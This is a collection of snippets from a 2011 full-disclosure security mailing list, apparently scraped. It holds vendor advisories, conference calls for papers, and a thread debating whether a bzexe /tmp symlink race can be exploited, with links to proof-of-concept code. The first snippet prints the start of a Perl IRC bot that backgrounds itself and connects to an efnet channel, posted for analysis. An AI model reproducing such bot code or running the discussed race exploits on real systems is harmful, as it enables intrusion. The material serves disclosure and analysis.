Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

#!/usr/bin/perl$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($

Re: [Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability

so this is will be considered as vulnerability or not ? because Successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account. Asheesh On Wed, Oct 26, 2011 at 5:55 AM, Darren McDonald wrote: > I think

[Full-disclosure] DDIVRT-2011-35 Cisco Unified Contact Center Express Directory Traversal [CVE-2011-3315]

Title - DDIVRT-2011-35 Cisco Unified Contact Center Express Directory Traversal [CVE-2011-3315] Severity High Date Discovered --- August 9, 2011 Discovered By - Digital Defense, Inc. Vulnerability Research Team Credit: r@b13$ Vulnerability Description -

[Full-disclosure] foofus.net security advisory - Toshiba eStudio Multifunction Printer Information Leakage

Foofus.net Security Advisory: foofus-20111026 Title:Toshiba eStudio Multifunction Printer Information Leakage Version: e-Studio seri

[Full-disclosure] [SECURITY] [DSA 2329-1] torque security update

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-2329-1secur...@debian.org http://www.debian.org/security/ Nico Golde Oct 27th, 2011

[Full-disclosure] SANS AppSec 2012 CFP is Open

Hi everyone, We're happy to announce that the sixth annual SANS AppSec Summit will be held in Las Vegas, Nevada on April 30 - May 1, 2012. The theme for this conference is "Application Security at Scale". Billions of records in the cloud. Millions of smart mobile devices. Millions of developer

Re: [Full-disclosure] Symlink vulnerabilities

This vulnerability is trivial and I don't even know why it is making so much noises as bzexe is almost never used and the exploit would only work under certain circumstances. It quoted it because it was an example of insecure uses of "/tmp", thats all! Note for "xD 0x41": before you say somethi

Re: [Full-disclosure] noise: Possible skydrive link to gov

Skydrive is the Microsoft cloud storage product, for documents, pictures, etc. It is similar to Dropbox, which is already a well-known LE intel source. From: xD 0x41 mailto:sec...@gmail.com>> Reply-To: "sec...@gmail.com" mailto:sec...@gmail.com>> Date: Wed, 26 Oct 2011

[Full-disclosure] Facebook Attach EXE Vulnerability

- 1. Summary: When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered to subvert this sec

[Full-disclosure] nullcon Goa 2012 Final call for Paper/Events and First round of speakers

Hi All, nullcon team is pleased to announce: - First round of speakers - JailBreak - Final Call for Events and Call for Papers for Goa 2012 First round of speakers: 1. Charlie Miller - Breaking iOS Code Signing 2. Atul Alex - Binary God: Custom Abstract

Re: [Full-disclosure] Symlink vulnerabilities

Vlad, I wont repeat myself, again, your PoC will NOT work. it will NOT get root anything! please, understand it, and maybe, make a working poc, then see why... It was shown clearly by 2 people or more that, it cannot work. If you can do better, and, sure, do what you said wich is exact area whe

Re: [Full-disclosure] Symlink vulnerabilities

BTE , exploits launched and ran from root, or even have anything todo with being near root dir, is not really what id call a userland poc. So, stop convincing me that you can exploit root, and look back a few examples, wich shows, your cmd as user, failing... and, if you say it cannot be any cleare

Re: [Full-disclosure] Symlink vulnerabilities

On Thu, Oct 27, 2011 at 9:43 AM, xD 0x41 wrote: > [SNIP] > > This means that right after the "ln" command AND before "/tmp/dd" is > launched, the user can replace the directory "/tmp/dd" by a shell script > with the same name ("/tmp/dd"). > > You try to change and fiddle here, it would need alot b

Re: [Full-disclosure] Symlink vulnerabilities

Oh man thats awesome paper... I love to read tavs stuff but, yea...hmmm. i also PMd vlad, and, exactly showed him, it is same place where it is failing, well, when it comes to clipping in the shell, exactly, it even complains ion removing a file, yet this is also,. in its cocde :s so, something is

Re: [Full-disclosure] Symlink vulnerabilities

On Fri, 28 Oct 2011 00:56:35 +1100, xD 0x41 said: > morning but, i trust you, itcannot be exploited, in any way, it will > only cause corruption of tar and compression utils, at most. Umm. Maybe in *that step* it's "at most". But what can you leverage that into? If you can screw with the code ex

Re: [Full-disclosure] [foofus-tools] discontinued?

naw we fuckin hate windows it sucks. On 27 October 2011 19:20, Kristen Eisenberg wrote: > Hi guys, well first of all thanx for building a tool like fgdump :) > but i'm worried, since 2k8 there is no update and it would be very sad > if it's discontinued... are you planning another release? > Kri

Re: [Full-disclosure] Symlink vulnerabilities

I will like to see this. as i simply see no way it can be won. and, why share the details with one side only ? abit biased. i dont believe you are winning 60% of the time atall. i think your also, full of bs. :) have a nice day. On 28 October 2011 01:20, wrote: > Hi, > > I've gotten this exploi

Re: [Full-disclosure] Symlink vulnerabilities

Hi, I've gotten this exploit to work, albeit on a slow 500mhz system with 256mb of ram. I've shared the details with vladz and will make them available soon. It's a hard race to win, but it can be won about 60% of the time. > On Fri, 28 Oct 2011 00:56:35 +1100, xD 0x41 said: > >> morning but, i

Re: [Full-disclosure] Symlink vulnerabilities

Imagine the following scenario: - You create /tmp/ (a directory) - Root is launching a bzexe-d binary (). - The ln done by bzexe results in the link being created inside /tmp/ (your directory), as explained by Vlad. - Before the bzexe shell script executes /tmp/, you remove your directory (/tmp/

Re: [Full-disclosure] Symlink vulnerabilities

Hi, > Also, i mean a up to date, 2011 kernel here, not sum shitty old root@b0rk:/root# uname -a Linux b0rk 2.6.24-29-generic #1 SMP Wed Aug 10 16:34:32 UTC 2011 i686 GNU/Linux > crapbox... i dont care for hardware but, if your shopoting from root > like vlads examples, and, look, I havediscuss

Re: [Full-disclosure] Symlink vulnerabilities

On Thu, 27 Oct 2011 09:51:33 EDT, Jeffrey Walton said: > On Thu, Oct 27, 2011 at 9:43 AM, xD 0x41 wrote: > > You try to change and fiddle here, it would need alot better than just > > the current shell scripting, and, even then, i dnt think it would win > > the race conditiobn. > See Bishop and D

Re: [Full-disclosure] [foofus-tools] discontinued?

Sounds like someone can't get enough flamewar. /eot On Thu, Oct 27, 2011 at 4:20 PM, GloW - XD wrote: > naw we fuckin hate windows it sucks. > > > On 27 October 2011 19:20, Kristen Eisenberg > wrote: > > Hi guys, well first of all thanx for building a tool like fgdump :) > > but i'm

Re: [Full-disclosure] Symlink vulnerabilities

I just wrote a quick PoC for this (warning: didn't test the code a lot): http://pastebin.com/FaaEsXRW (compile that with -O3). successfully tried it on my machine (Debian stable, amd64, high-end laptop). It probably has more chances of success on low-end hardware, or if the system is busy. If y

Re: [Full-disclosure] Symlink vulnerabilities

On Thu, 27 Oct 2011 10:39:46 EDT,somebody before b...@fbi.dhs.org said: > > I still think its crap anyhow, so, enjoy your 60% chance s[ploit on, > > whats not going to be a recent 2011 kernel :) Whoever wrote this should stop and ponder a bit - how does the kernel release enter into it? The explo

Re: [Full-disclosure] Symlink vulnerabilities

Thanks ! Mine is definitely not more refined, it simply does the same ;-) the only advantage I see is that it's written in C and will probably run faster - giving it more chances of success. On 27/10/11 17:12, b...@fbi.dhs.org wrote: > my notes/exploit: > > http://www.downspout.org/?q=node/7 > >

Re: [Full-disclosure] Symlink vulnerabilities

my notes/exploit: http://www.downspout.org/?q=node/7 I am sure yours is more refined than mine. > I just wrote a quick PoC for this (warning: didn't test the code a lot): > > http://pastebin.com/FaaEsXRW > > (compile that with -O3). > successfully tried it on my machine (Debian stable, amd64, h

Re: [Full-disclosure] Symlink vulnerabilities

> Thanks ! > > Mine is definitely not more refined, it simply does the same ;-) > the only advantage I see is that it's written in C and will probably run > faster - giving it more chances of success. Yes, I suspect your success rate will be much better than mine. =-) > > On 27/10/11 17:12, b...

[Full-disclosure] Xorg file permission change PoC (CVE-2011-4029)

Hi list, A couple of weeks ago, I found a permission change vulnerability in the way that Xorg handled its lock files. Once exploited, it allowed a local user to modify the file permissions of an arbitrary file to 444 (read for all). It has been assigned CVE-2011-4029, X.org released a patch o

Re: [Full-disclosure] Microsoft Outlook Web Access Session sidejacking/Session Replay Vulnerability

On Tue, Oct 25, 2011 at 8:26 PM, information security < informationhacke...@gmail.com> wrote: > > == > > Microsoft Outlook Web Access Session > sidejacking/Session Replay Vulnerability > > ===

Re: [Full-disclosure] [foofus-tools] discontinued?

The fgdump is backdoored Kristen- danke fuer ihre bases. From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Christian Sciberras Sent: 27 October 2011 15:51 To: GloW - XD Cc: Kristen Eisenberg; full-disclosure@lists.grok.org.uk Subject

Re: [Full-disclosure] [foofus-tools] discontinued?

s/flamewar/truth/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Symlink vulnerabilities

On 2011-10-27, at 07:48, valdis.kletni...@vt.edu wrote: > The other thing that people need to remember is that there's no race condition > that's so small that you can't hit it. If there's a race condition, it *can* > be won. And systems like inotify make filesystem races trivial to win. I wouldn

Re: [Full-disclosure] Symlink vulnerabilities

On Thu, Oct 27, 2011 at 05:01:30PM +0200, Benjamin Renaut wrote: > http://pastebin.com/FaaEsXRW Nice thing, but for sure, it can be optimized. For example, to save time, I would suggest you to use rename() instead of using both unlink() and rmdir() functions. Same thing for your write_shellco

Re: [Full-disclosure] Symlink vulnerabilities

On Thu, 27 Oct 2011 10:31:12 PDT, Andrew Farmer said: > And systems like inotify make filesystem races trivial to win. I > wouldn't be surprised if you could win this particular race reliably by > watching for the files bzexe drops and acting immediately when they show > up. Good point. That actu

Re: [Full-disclosure] Symlink vulnerabilities

On 27/10/11 19:34, vladz wrote: > Nice thing, but for sure, it can be optimized. For example, to save > time, I would suggest you to use rename() instead of using both > unlink() and rmdir() functions. Same thing for your write_shellcode() > function, it contains too much calls. It would be pref

Re: [Full-disclosure] Symlink vulnerabilities

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Andrew Farmer wrote: > On 2011-10-27, at 07:48, valdis.kletni...@vt.edu wrote: >> The other thing that people need to remember is that there's no >> race condition that's so small that you can't hit it. If there's >> a race condition, it *can* be won.

[Full-disclosure] ZDI-11-311 : Apple Quicktime Empty URL Data Handler Remote Code Execution Vulnerability

ZDI-11-311 : Apple Quicktime Empty URL Data Handler Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-311 October 27, 2011 -- CVE ID: CVE-2011-3220 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Apple -- Affected Products: Apple Quicktime

[Full-disclosure] ZDI-11-313 : Apple QuickTime FLC RLE Packet Count Decompression Remote Code Execution Vulnerability

ZDI-11-313 : Apple QuickTime FLC RLE Packet Count Decompression Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-313 October 27, 2011 -- CVE ID: CVE-2011-3223 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Apple -- Affected Products: Apple

[Full-disclosure] ZDI-11-312 : Apple QuickTime Atom Hierarachy Argument Size Mismatch Remote Code Execution Vulnerability

ZDI-11-312 : Apple QuickTime Atom Hierarachy Argument Size Mismatch Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-312 October 27, 2011 -- CVE ID: CVE-2011-3221 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Apple -- Affected Products:

[Full-disclosure] ZDI-11-314 : Apple Quicktime PnPixPat PatType 3 Parsing Remote Code Execution Vulnerability

ZDI-11-314 : Apple Quicktime PnPixPat PatType 3 Parsing Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-314 October 27, 2011 -- CVE ID: CVE-2011-3247 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Apple -- Affected Products: Apple Quickt

[Full-disclosure] ZDI-11-315 : Apple QuickTime FLC Delta Decompression Remote Code Execution Vulnerability

ZDI-11-315 : Apple QuickTime FLC Delta Decompression Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-315 October 27, 2011 -- CVE ID: CVE-2011-3249 -- CVSS: 9, AV:N/AC:L/Au:N/C:P/I:P/A:C -- Affected Vendors: Apple -- Affected Products: Apple Quicktime

[Full-disclosure] ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability

ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-316 October 27, 2011 -- CVE ID: CVE-2011-3251 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Apple -- Affected Products: Apple Quicktime

Re: [Full-disclosure] Facebook Attach EXE Vulnerability

can't believe such was on FB wahahaha !!! lol rofl ... When was this discovered and fixed ? On Thu, Oct 27, 2011 at 1:02 AM, Nathan Power wrote: > > - > 1. Summary: > > When using the Facebook 'Messages' t

Re: [Full-disclosure] Symlink vulnerabilities

Yes... even adding a cron entry is possible if done right ;) On 28 October 2011 04:51, wrote: > On Thu, 27 Oct 2011 10:31:12 PDT, Andrew Farmer said: >> And systems like inotify make filesystem races trivial to win. I >> wouldn't be surprised if you could win this particular race reliably by >>

Re: [Full-disclosure] Symlink vulnerabilities

I love this, your stufs always impressing me.. I have to much work on atm, (specially since im doing a hand in yur old P3 or P4 for a spankin new Ibm netvista p4 duacpu!) that was a mistake :s but, i will see what others in my channel think, i will post the tool and mark it as interest, and see wha

[Full-disclosure] VMSA-2011-0013 VMware third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2011-0013 Synopsis:VMware third party component updates for VMware vCenter Server, vCenter U